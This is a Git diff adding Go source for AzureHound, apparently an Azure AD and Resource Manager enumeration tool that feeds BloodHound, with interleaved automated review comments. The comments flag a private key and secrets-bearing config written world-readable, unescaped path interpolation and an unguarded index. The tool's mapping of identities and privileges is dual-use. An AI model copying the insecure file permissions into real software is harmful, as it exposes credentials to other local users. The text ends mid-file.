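Review bot: `ParseBody` decodes the JWT payload with `base64.RawStdEncoding`, but JWT segments are base64url-encoded (RFC 7515), so an access token whose payload segment contains `-` or `_` fails to decode and `ParseAud` returns an error for a valid token. The decode should be `base64.RawURLEncoding.DecodeString(parts[1])`. A doc comment on `ParseBody` and `ParseAud` should also state that the claims are read without signature verification, so the returned `aud` is suitable for routing or diagnostics only, not for a trust decision. Separately, `IsClosedConnectionErr` calls `err.Error()` with no nil guard; `if err == nil { return false }` as its first statement would make it safe when a caller passes an unchecked error.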
@@ -0,0 +1,55 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package client
+
+import (
+ "context"
+ "fmt"
+
+ "github.com/bloodhoundad/azurehound/v2/client/query"
+ "github.com/bloodhoundad/azurehound/v2/constants"
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+)
+
+// ListAzureADRoleAssignments https://learn.microsoft.com/en-us/graph/api/rbacapplication-list-roleassignments?view=graph-rest-beta
+func (s *azureClient) ListAzureADRoleAssignments(ctx context.Context, params query.GraphParams) <-chan AzureResult[azure.UnifiedRoleAssignment] {
+ var (
+ out = make(chan AzureResult[azure.UnifiedRoleAssignment])
+ path = fmt.Sprintf("/%s/roleManagement/directory/roleAssignments", constants.GraphApiVersion)
+ )
+
+ if params.Top == 0 {
+ params.Top = 999
+ }
+
+ go getAzureObjectList[azure.UnifiedRoleAssignment](s.msgraph, ctx, path, params, out)
+ return out
+}
+
+// ListRoleAssignmentsForResource https://learn.microsoft.com/en-us/rest/api/authorization/role-assignments/list-for-resource?view=rest-authorization-2015-07-01
+func (s *azureClient) ListRoleAssignmentsForResource(ctx context.Context, resourceId string, filter, tenantId string) <-chan AzureResult[azure.RoleAssignment] {
+ var (
+ out = make(chan AzureResult[azure.RoleAssignment])
+ path = fmt.Sprintf("%s/providers/Microsoft.Authorization/roleAssignments", resourceId)
+ params = query.RMParams{ApiVersion: "2015-07-01", Filter: filter, TenantId: tenantId}
+ )
+
+ go getAzureObjectList[azure.RoleAssignment](s.resourceManager, ctx, path, params, out)
+
+ return out
+}
diff --git a/client/roles.go b/client/roles.go
new file mode 100644
index 0000000..6299ef2
--- /dev/null
+++ b/client/roles.go
@@ -0,0 +1,39 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package client
+
+import (
+ "context"
+ "fmt"
+
+ "github.com/bloodhoundad/azurehound/v2/client/query"
+ "github.com/bloodhoundad/azurehound/v2/constants"
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+)
+
+// ListAzureADRoles https://learn.microsoft.com/en-us/graph/api/rbacapplication-list-roledefinitions?view=graph-rest-beta
+func (s *azureClient) ListAzureADRoles(ctx context.Context, params query.GraphParams) <-chan AzureResult[azure.Role] {
+ var (
+ out = make(chan AzureResult[azure.Role])
+ path = fmt.Sprintf("/%s/roleManagement/directory/roleDefinitions", constants.GraphApiVersion)
+ )
+
+ go getAzureObjectList[azure.Role](s.msgraph, ctx, path, params, out)
+
+ return out
+}
diff --git a/client/service_principals.go b/client/service_principals.go
new file mode 100644
index 0000000..0c56e8c
--- /dev/null
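Review bot: In `ListRoleAssignmentsForResource`, `resourceId` is spliced into the request path with `%s` and nothing in the function checks its shape, so an empty value or one containing `?` or `#` silently changes which scope or query is sent to Resource Manager. A comment stating the expected form (a full ARM resource ID beginning with `/`) plus a guard before the goroutine is started would make the contract explicit; how an error would be reported on `out` depends on `AzureResult` and `getAzureObjectList`, which are not visible in this hunk. The same unescaped interpolation applies to `objectId` in client/service_principals.go and to `subscriptionId`, `resourceGroupName` and `saName` in client/storage_accounts.go, client/virtual_machines.go, client/vm_scale_sets.go and client/web_apps.go, where single-segment values could be passed through `url.PathEscape`.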
+++ b/client/service_principals.go 
@@ -0,0 +1,60 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package client
+
+import (
+ "context"
+ "encoding/json"
+ "fmt"
+
+ "github.com/bloodhoundad/azurehound/v2/client/query"
+ "github.com/bloodhoundad/azurehound/v2/constants"
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+)
+
+// ListAzureADServicePrincipals https://learn.microsoft.com/en-us/graph/api/serviceprincipal-list?view=graph-rest-beta
+func (s *azureClient) ListAzureADServicePrincipals(ctx context.Context, params query.GraphParams) <-chan AzureResult[azure.ServicePrincipal] {
+ var (
+ out = make(chan AzureResult[azure.ServicePrincipal])
+ path = fmt.Sprintf("/%s/servicePrincipals", constants.GraphApiVersion)
+ )
+
+ if params.Top == 0 {
+ params.Top = 999
+ }
+
+ go getAzureObjectList[azure.ServicePrincipal](s.msgraph, ctx, path, params, out)
+
+ return out
+}
+
+// ListAzureADServicePrincipalOwners https://learn.microsoft.com/en-us/graph/api/serviceprincipal-list-owners?view=graph-rest-beta
+func (s *azureClient) ListAzureADServicePrincipalOwners(ctx context.Context, objectId string, params query.GraphParams) <-chan AzureResult[json.RawMessage] {
+ var (
+ out = make(chan AzureResult[json.RawMessage])
+ path = fmt.Sprintf("/%s/servicePrincipals/%s/owners", constants.GraphApiBetaVersion, objectId)
+ )
+
+ if params.Top == 0 {
+ params.Top = 999
+ }
+
+ go getAzureObjectList[json.RawMessage](s.msgraph, ctx, path, params, out)
+
+ return out
+}
diff --git a/client/storage_accounts.go b/client/storage_accounts.go
new file mode 100644
index 0000000..402d247
--- /dev/null
+++ b/client/storage_accounts.go
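Review bot: `ListAzureADServicePrincipalOwners` builds its path from `constants.GraphApiBetaVersion` while `ListAzureADServicePrincipals` in the same file uses `constants.GraphApiVersion`, and neither doc comment says why the two differ. If the owners call really needs the beta endpoint, say so in its comment, e.g. `// Uses the beta Graph endpoint because <reason>.`; otherwise use the same constant in both functions so the collected objects come from one API version. The values of the two constants are defined outside this hunk, so the difference may be intentional.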
@@ -0,0 +1,56 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package client
+
+import (
+ "context"
+ "fmt"
+
+ "github.com/bloodhoundad/azurehound/v2/client/query"
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+)
+
+// ListAzureStorageAccounts https://learn.microsoft.com/en-us/rest/api/storagerp/storage-accounts/list?view=rest-storagerp-2022-05-01
+func (s *azureClient) ListAzureStorageAccounts(ctx context.Context, subscriptionId string) <-chan AzureResult[azure.StorageAccount] {
+ var (
+ out = make(chan AzureResult[azure.StorageAccount])
+ path = fmt.Sprintf("/subscriptions/%s/providers/Microsoft.Storage/storageAccounts", subscriptionId)
+ params = query.RMParams{ApiVersion: "2022-05-01"}
+ )
+
+ go getAzureObjectList[azure.StorageAccount](s.resourceManager, ctx, path, params, out)
+
+ return out
+}
+
+// ==
+// Storage containers
+// ==
+
+// ListAzureStorageContainers https://learn.microsoft.com/en-us/rest/api/storagerp/blob-containers/list?view=rest-storagerp-2022-05-01
+func (s *azureClient) ListAzureStorageContainers(ctx context.Context, subscriptionId string, resourceGroupName string, saName string, filter string, includeDeleted string, maxPageSize string) <-chan AzureResult[azure.StorageContainer] {
+ var (
+ out = make(chan AzureResult[azure.StorageContainer])
+ path = fmt.Sprintf("/subscriptions/%s/resourceGroups/%s/providers/Microsoft.Storage/storageAccounts/%s/blobServices/default/containers", subscriptionId, resourceGroupName, saName)
+ params = query.RMParams{ApiVersion: "2022-05-01", Filter: filter, IncludeDeleted: includeDeleted, MaxPageSize: maxPageSize}
+ )
+
+ go getAzureObjectList[azure.StorageContainer](s.resourceManager, ctx, path, params, out)
+
+ return out
+}
diff --git a/client/subscriptions.go b/client/subscriptions.go
new file mode 100644
index 0000000..0ed8933
--- /dev/null
+++ b/client/subscriptions.go
@@ -0,0 +1,38 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package client
+
+import (
+ "context"
+
+ "github.com/bloodhoundad/azurehound/v2/client/query"
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+)
+
+// ListAzureSubscriptions https://learn.microsoft.com/en-us/rest/api/subscription/subscriptions/list?view=rest-subscription-2020-01-01
+func (s *azureClient) ListAzureSubscriptions(ctx context.Context) <-chan AzureResult[azure.Subscription] {
+ var (
+ out = make(chan AzureResult[azure.Subscription])
+ path = "/subscriptions"
+ params = query.RMParams{ApiVersion: "2020-01-01"}
+ )
+
+ go getAzureObjectList[azure.Subscription](s.resourceManager, ctx, path, params, out)
+
+ return out
+}
diff --git a/client/tenants.go b/client/tenants.go
new file mode 100644
index 0000000..4aa8966
--- /dev/null
+++ b/client/tenants.go
@@ -0,0 +1,72 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package client
+
+import (
+ "context"
+ "fmt"
+
+ "github.com/bloodhoundad/azurehound/v2/client/query"
+ "github.com/bloodhoundad/azurehound/v2/client/rest"
+ "github.com/bloodhoundad/azurehound/v2/constants"
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+)
+
+func (s *azureClient) GetAzureADOrganization(ctx context.Context, selectCols []string) (*azure.Organization, error) {
+ var (
+ path = fmt.Sprintf("/%s/organization", constants.GraphApiVersion)
+ response azure.OrganizationList
+ )
+ if res, err := s.msgraph.Get(ctx, path, query.GraphParams{Select: selectCols}, nil); err != nil {
+ return nil, err
+ } else if err := rest.Decode(res.Body, &response); err != nil {
+ return nil, err
+ } else {
+ return &response.Value[0], nil
+ }
+}
+
+func (s *azureClient) GetAzureADTenants(ctx context.Context, includeAllTenantCategories bool) (azure.TenantList, error) {
+ var (
+ path = "/tenants"
+ params = query.RMParams{ApiVersion: "2020-01-01", IncludeAllTenantCategories: includeAllTenantCategories}
+ headers map[string]string
+ response azure.TenantList
+ )
+
+ if res, err := s.resourceManager.Get(ctx, path, params, headers); err != nil {
+ return response, err
+ } else if err := rest.Decode(res.Body, &response); err != nil {
+ return response, err
+ } else {
+ return response, nil
+ }
+}
+
+// ListAzureADTenants https://learn.microsoft.com/en-us/rest/api/subscription/tenants/list?view=rest-subscription-2020-01-01
+func (s *azureClient) ListAzureADTenants(ctx context.Context, includeAllTenantCategories bool) <-chan AzureResult[azure.Tenant] {
+ var (
+ out = make(chan AzureResult[azure.Tenant])
+ path = "/tenants"
+ params = query.RMParams{ApiVersion: "2020-01-01", IncludeAllTenantCategories: includeAllTenantCategories}
+ )
+
+ go getAzureObjectList[azure.Tenant](s.resourceManager, ctx, path, params, out)
+
+ return out
+}
diff --git a/client/users.go b/client/users.go
new file mode 100644
index 0000000..d20f4bf
--- /dev/null
+++ b/client/users.go
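Review bot: `GetAzureADOrganization` returns `&response.Value[0]` without checking the slice length, so a response whose `value` array is empty panics with an index-out-of-range instead of returning an error to the caller. Add a branch before the final `else`: `} else if len(response.Value) == 0 { return nil, fmt.Errorf("no organization returned") }`. `GetAzureADOrganization` and `GetAzureADTenants` also have no doc comment, unlike `ListAzureADTenants` below them; a one-line comment naming the endpoint each one calls would match the rest of the package.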
@@ -0,0 +1,43 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package client
+
+import (
+ "context"
+ "fmt"
+
+ "github.com/bloodhoundad/azurehound/v2/client/query"
+ "github.com/bloodhoundad/azurehound/v2/constants"
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+)
+
+// ListAzureADUsers https://learn.microsoft.com/en-us/graph/api/user-list?view=graph-rest-beta
+func (s *azureClient) ListAzureADUsers(ctx context.Context, params query.GraphParams) <-chan AzureResult[azure.User] {
+ var (
+ out = make(chan AzureResult[azure.User])
+ path = fmt.Sprintf("/%s/users", constants.GraphApiVersion)
+ )
+
+ if params.Top == 0 {
+ params.Top = 999
+ }
+
+ go getAzureObjectList[azure.User](s.msgraph, ctx, path, params, out)
+
+ return out
+}
diff --git a/client/virtual_machines.go b/client/virtual_machines.go
new file mode 100644
index 0000000..673d36c
--- /dev/null
+++ b/client/virtual_machines.go
@@ -0,0 +1,42 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package client
+
+import (
+ "context"
+ "fmt"
+
+ "github.com/bloodhoundad/azurehound/v2/client/query"
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+)
+
+// ListAzureVirtualMachines https://learn.microsoft.com/en-us/rest/api/compute/virtual-machines/list-all?view=rest-compute-2021-07-01
+func (s *azureClient) ListAzureVirtualMachines(ctx context.Context, subscriptionId string, params query.RMParams) <-chan AzureResult[azure.VirtualMachine] {
+ var (
+ out = make(chan AzureResult[azure.VirtualMachine])
+ path = fmt.Sprintf("/subscriptions/%s/providers/Microsoft.Compute/virtualMachines", subscriptionId)
+ )
+
+ if params.ApiVersion == "" {
+ params.ApiVersion = "2021-07-01"
+ }
+
+ go getAzureObjectList[azure.VirtualMachine](s.resourceManager, ctx, path, params, out)
+
+ return out
+}
diff --git a/client/vm_scale_sets.go b/client/vm_scale_sets.go
new file mode 100644
index 0000000..8ac1e42
--- /dev/null
+++ b/client/vm_scale_sets.go
@@ -0,0 +1,39 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package client
+
+import (
+ "context"
+ "fmt"
+
+ "github.com/bloodhoundad/azurehound/v2/client/query"
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+)
+
+// ListAzureVMScaleSets https://learn.microsoft.com/en-us/rest/api/compute/virtual-machine-scale-sets/list-all?view=rest-compute-2022-11-01
+func (s *azureClient) ListAzureVMScaleSets(ctx context.Context, subscriptionId string) <-chan AzureResult[azure.VMScaleSet] {
+ var (
+ out = make(chan AzureResult[azure.VMScaleSet])
+ path = fmt.Sprintf("/subscriptions/%s/providers/Microsoft.Compute/virtualMachineScaleSets", subscriptionId)
+ params = query.RMParams{ApiVersion: "2022-11-01"}
+ )
+
+ go getAzureObjectList[azure.VMScaleSet](s.resourceManager, ctx, path, params, out)
+
+ return out
+}
diff --git a/client/web_apps.go b/client/web_apps.go
new file mode 100644
index 0000000..4ae12fc
--- /dev/null
+++ b/client/web_apps.go
@@ -0,0 +1,39 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package client
+
+import (
+ "context"
+ "fmt"
+
+ "github.com/bloodhoundad/azurehound/v2/client/query"
+ "github.com/bloodhoundad/azurehound/v2/models/azure"
+)
+
+// ListAzureWebApps https://learn.microsoft.com/en-us/rest/api/appservice/web-apps/list?view=rest-appservice-2022-03-01
+func (s *azureClient) ListAzureWebApps(ctx context.Context, subscriptionId string) <-chan AzureResult[azure.WebApp] {
+ out := make(chan AzureResult[azure.WebApp])
+ var (
+ path = fmt.Sprintf("/subscriptions/%s/providers/Microsoft.Web/sites", subscriptionId)
+ params = query.RMParams{ApiVersion: "2022-03-01"}
+ )
+
+ go getAzureObjectList[azure.WebApp](s.resourceManager, ctx, path, params, out)
+
+ return out
+}
diff --git a/cmd/configure.go b/cmd/configure.go
new file mode 100644
index 0000000..f845bdc
--- /dev/null
+++ b/cmd/configure.go
@@ -0,0 +1,295 @@
+// Copyright (C) 2022 Specter Ops, Inc.
+//
+// This file is part of AzureHound.
+//
+// AzureHound is free software: you can redistribute it and/or modify
+// it under the terms of the GNU General Public License as published by
+// the Free Software Foundation, either version 3 of the License, or
+// (at your option) any later version.
+//
+// AzureHound is distributed in the hope that it will be useful,
+// but WITHOUT ANY WARRANTY; without even the implied warranty of
+// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+// GNU General Public License for more details.
+//
+// You should have received a copy of the GNU General Public License
+// along with this program. If not, see .
+
+package cmd
+
+import (
+ "bytes"
+ "crypto/rand"
+ "crypto/rsa"
+ "crypto/x509"
+ "crypto/x509/pkix"
+ "encoding/pem"
+ "errors"
+ "fmt"
+ "io/ioutil"
+ "math"
+ "math/big"
+
+ "net/mail"
+ "net/url"
+ "os"
+ "path/filepath"
+ "time"
+
+ "github.com/bloodhoundad/azurehound/v2/config"
+ "github.com/bloodhoundad/azurehound/v2/enums"
+ "github.com/gofrs/uuid"
+ "github.com/manifoldco/promptui"
+ "github.com/spf13/cobra"
+ "github.com/spf13/viper"
+ "github.com/youmark/pkcs8"
+)
+
+func init() {
+ rootCmd.AddCommand(configureCmd)
+}
+
+var configureCmd = &cobra.Command{
+ Use: "configure",
+ Short: "Configure AzureHound",
+ Run: configureCmdImpl,
+ SilenceUsage: true,
+}
+
+func configureCmdImpl(cmd *cobra.Command, args []string) {
+ if err := configure(); err != nil {
+ exit(fmt.Errorf("failed to configure cobra CLI: %w", err))
+ }
+}
+
+func configure() error {
+ var (
+ configFile = config.ConfigFile.Value().(string)
+ configDir = filepath.Dir(configFile)
+ genCert bool
+ genCertPath = filepath.Join(configDir, "cert.pem")
+ genKeyPath = filepath.Join(configDir, "key.pem")
+ )
+
+ // Configure Azure connection
+ if _, region, err := choose("Azure Region", config.AzRegions, 1); err != nil {
+ return err
+ } else if tenantId, err := prompt("Directory (tenant) ID", validateGuid, false); err != nil {
+ return err
+ } else if appId, err := prompt("Application (client) ID", validateGuid, false); err != nil {
+ return err
+ } else if _, authMethod, err := choose("Authentication Method", enums.AuthMethods(), 0); err != nil {
+ return err
+ } else {
+ config.AzRegion.Set(region)
+ config.AzTenant.Set(tenantId)
+ config.AzAppId.Set(appId)
+
+ if authMethod == enums.Certificate {
+ if genCert = confirm("Generate Certificate and Key", true); genCert {
+ if keyPass, err := prompt("Private Key Passphrase (optional)", nil, true); err != nil {
+ return err
+ } else {
+ config.AzCert.Set(genCertPath)
+ config.AzKey.Set(genKeyPath)
+ config.AzKeyPass.Set(keyPass)
+ }
+ } else if certPath, err := prompt("Public Certificate Path", validatePem, false); err != nil {
+ return err
+ } else if keyPath, err := prompt("Private Key Path", validatePem, false); err != nil {
+ return err
+ } else if keyPass, err := prompt("Private Key Passphrase (optional)", nil, true); err != nil {
+ return err
+ } else {
+ config.AzCert.Set(certPath)
+ config.AzKey.Set(keyPath)
+ config.AzKeyPass.Set(keyPass)
+ }
+ } else if authMethod == enums.UsernamePassword {
+ if upn, err := prompt("Input the User Principal Name", validateUserPrincipalName, false); err != nil {
+ return err
+ } else if password, err := prompt("Input the password", nil, true); err != nil {
+ return err
+ } else {
+ config.AzUsername.Set(upn)
+ config.AzPassword.Set(password)
+ }
+ } else if secret, err := prompt("Client Secret", nil, true); err != nil {
+ return err
+ } else {
+ config.AzSecret.Set(secret)
+ }
+
+ }
+
+ // Configure BloodHound Enterprise Connection
+ if confirm("Setup connection to BloodHound Enterprise", true) {
+ if bheUrl, err := prompt("BloodHound Enterprise URL", config.ValidateURL, false); err != nil {
+ return err
+ } else if bheTokenId, err := prompt("BloodHound Enterprise Token ID", validateGuid, false); err != nil {
+ return err
+ } else if bheToken, err := prompt("BloodHound Enterprise Token", nil, true); err != nil {
+ return err
+ } else {
+ config.BHEUrl.Set(bheUrl)
+ config.BHETokenId.Set(bheTokenId)
+ config.BHEToken.Set(bheToken)
+ }
+ }
+
+ // Configure Proxy
+ if confirm("Set proxy URL", true) {
+ if proxyURL, err := prompt("Proxy URL", config.ValidateURL, false); err != nil {
+ return err
+ } else {
+ if parsedURL, err := url.Parse(proxyURL); err != nil {
+ return err
+ } else {
+ if parsedURL.Scheme != "https" && parsedURL.Scheme != "http" {
+ return errors.New("unsupported proxy url scheme")
+ } else {
+ config.Proxy.Set(proxyURL)
+ }
+ }
+ }
+ }
+
+ // Configure Logging
+ if confirm("Setup AzureHound logging", true) {
+ if idx, _, err := choose("Verbosity", verbosityOptions, 1); err != nil {
+ return err
+ } else if logFile, err := prompt("Log file (optional)", nil, false); err != nil {
+ return err
+ } else {
+ config.VerbosityLevel.Set(idx - 1)
+ config.LogFile.Set(logFile)
+ config.JsonLogs.Set(confirm("Enable Structured Logs", false))
+ }
+ }
+
+ // writing the configfile path in the configfile is confusing
+ config.ConfigFile.Set(nil)
+ if err := os.MkdirAll(configDir, os.ModePerm); err != nil {
+ return err
+ } else if err := viper.WriteConfigAs(configFile); err != nil {
+ return err
+ } else {
+ fmt.Fprintf(os.Stderr, "\nConfiguration written to %s\n", configFile)
+ }
+
+ if genCert {
+ if cert, key, err := generateCert(config.AzKeyPass.Value().(string)); err != nil {
+ return err
+ } else if err := os.WriteFile(genCertPath, cert, 0644); err != nil {
+ return err
+ } else if err := os.WriteFile(genKeyPath, key, 0644); err != nil {
+ return err
+ } else {
+ fmt.Fprintf(os.Stderr, "Key written to %s\n", genKeyPath)
+ fmt.Fprintf(os.Stderr, "Certificate written to %s\n", genCertPath)
+ fmt.Fprintln(os.Stderr, "\nEnsure certificate is uploaded to your application's client credentials")
+ }
+ }
+ return nil
+}
+
+func prompt(label string, validator func(string) error, isSensitive bool) (string, error) {
+ p := promptui.Prompt{
+ Label: label,
+ Validate: validator,
+ }
+ if isSensitive {
+ p.HideEntered = true
+ p.Mask = '*'
+ }
+ return p.Run()
+}
+
+func choose(label string, items []string, pos int) (int, string, error) {
+ s := promptui.Select{
+ Label: label,
+ CursorPos: pos,
+ Items: items,
+ Templates: &promptui.SelectTemplates{
+ Selected: fmt.Sprintf(`{{ "%s:" | faint }} {{ . }}`, label),
+ },
+ }
+ return s.Run()
+}
+
+func confirm(label string, defaultYes bool) bool {
+ p := promptui.Prompt{
+ Label: label,
+ HideEntered: true,
+ IsConfirm: true,
+ }
+ if defaultYes {
+ p.Default = "y"
+ }
+ _, err := p.Run()
+ return err == nil
+}
+
+func validateGuid(input string) error {
+ _, err := uuid.FromString(input)
+ return err
+}
+
+func validatePem(input string) error {
+ if content, err := ioutil.ReadFile(input); err != nil {
+ return err
+ } else if pemFile, _ := pem.Decode(content); pemFile == nil {
+ return fmt.Errorf("Invalid PEM encoded file")
+ } else {
+ return nil
+ }
+}
+
+func validateUserPrincipalName(input string) error {
+ _, err := mail.ParseAddress(input)
+ return err
+}
+
+var verbosityOptions = []string{
+ "Disabled",
+ "Default",
+ "Debug",
+ "Trace",
+}
+
+func generateCert(passphrase string) ([]byte, []byte, error) {
+ var (
+ cert = &x509.Certificate{
+ Subject: pkix.Name{
+ CommonName: "azurehound",
+ },
+ NotBefore: time.Now(),
+ NotAfter: time.Now().AddDate(1, 0, 0),
+ }
+
+ certPEM = bytes.Buffer{}
+ keyPEM = bytes.Buffer{}
+ )
+
+ // Generate random serial number for certificate
+ if serial, err := rand.Int(rand.Reader, big.NewInt(math.MaxInt64)); err != nil {
+ return nil, nil, err
+ } else {
+ cert.SerialNumber = serial
+ }
+
+ // Generate rsa keys and certificate and encode to PEM files
+ if privateKey, err := rsa.GenerateKey(rand.Reader, 4096); err != nil {
+ return nil, nil, err
+ } else if data, err := x509.CreateCertificate(rand.Reader, cert, cert, &privateKey.PublicKey, privateKey); err != nil {
+ return nil, nil, err
+ } else if err := pem.Encode(&certPEM, &pem.Block{Type: "CERTIFICATE", Bytes: data}); err != nil {
+ return nil, nil, err
+ } else if data, err := pkcs8.MarshalPrivateKey(privateKey, []byte(passphrase), nil); err != nil {
+ return nil, nil, err
+ } else if err := pem.Encode(&keyPEM, &pem.Block{Type: "PRIVATE KEY", Bytes: data}); err != nil {
+ return nil, nil, err
+ } else {
+ return certPEM.Bytes(), keyPEM.Bytes(), nil
+ }
+}
diff --git a/cmd/install_windows.go b/cmd/install_windows.go
new file mode 100644
index 0000000..579493a
--- /dev/null
+++ b/cmd/install_windows.go
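Review bot: `configure` writes the generated private key with `os.WriteFile(genKeyPath, key, 0644)` and creates the config directory with `os.MkdirAll(configDir, os.ModePerm)`, so, subject to the umask, the key is readable by every local user. The key should be written with mode `0600` and the directory created with `0700`. The file written by `viper.WriteConfigAs(configFile)` holds the client secret, password, BloodHound Enterprise token and key passphrase set earlier in the function, so it should be restricted the same way, e.g. `viper.SetConfigPermissions(0600)` before the write. Because the passphrase is stored in that file next to `key.pem`, it adds little protection once the directory itself is readable.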
@@ -0,0 +1,157 @@ +// Copyright (C) 2022 Specter Ops, Inc. +// +// This file is part of AzureHound. +// +// AzureHound is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. +// +// AzureHound is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. +// +// You should have received a copy of the GNU General Public License +// along with this program. If not, see . + +package cmd + +import ( + "fmt" + "io" + "os" + "path/filepath" + "time" + + "github.com/bloodhoundad/azurehound/v2/config" + "github.com/bloodhoundad/azurehound/v2/constants" + "github.com/spf13/cobra" + + "golang.org/x/sys/windows/svc/eventlog" + "golang.org/x/sys/windows/svc/mgr" +) + +func init() { + rootCmd.AddCommand(installCmd) +} + +var installCmd = &cobra.Command{ + Use: "install", + Short: "Installs AzureHound as a system service for BloodHound Enterprise", + Run: installCmdImpl, + PersistentPreRunE: persistentPreRunE, + SilenceUsage: true, +} + +func installCmdImpl(cmd *cobra.Command, args []string) { + var ( + config = mgr.Config{ + DisplayName: constants.DisplayName, + Description: constants.Description, + StartType: mgr.StartAutomatic, + DelayedAutoStart: true, + } + recoveryActions = []mgr.RecoveryAction{ + {Type: mgr.ServiceRestart, Delay: 5 * time.Second}, + {Type: mgr.ServiceRestart, Delay: 30 * time.Second}, + {Type: mgr.ServiceRestart, 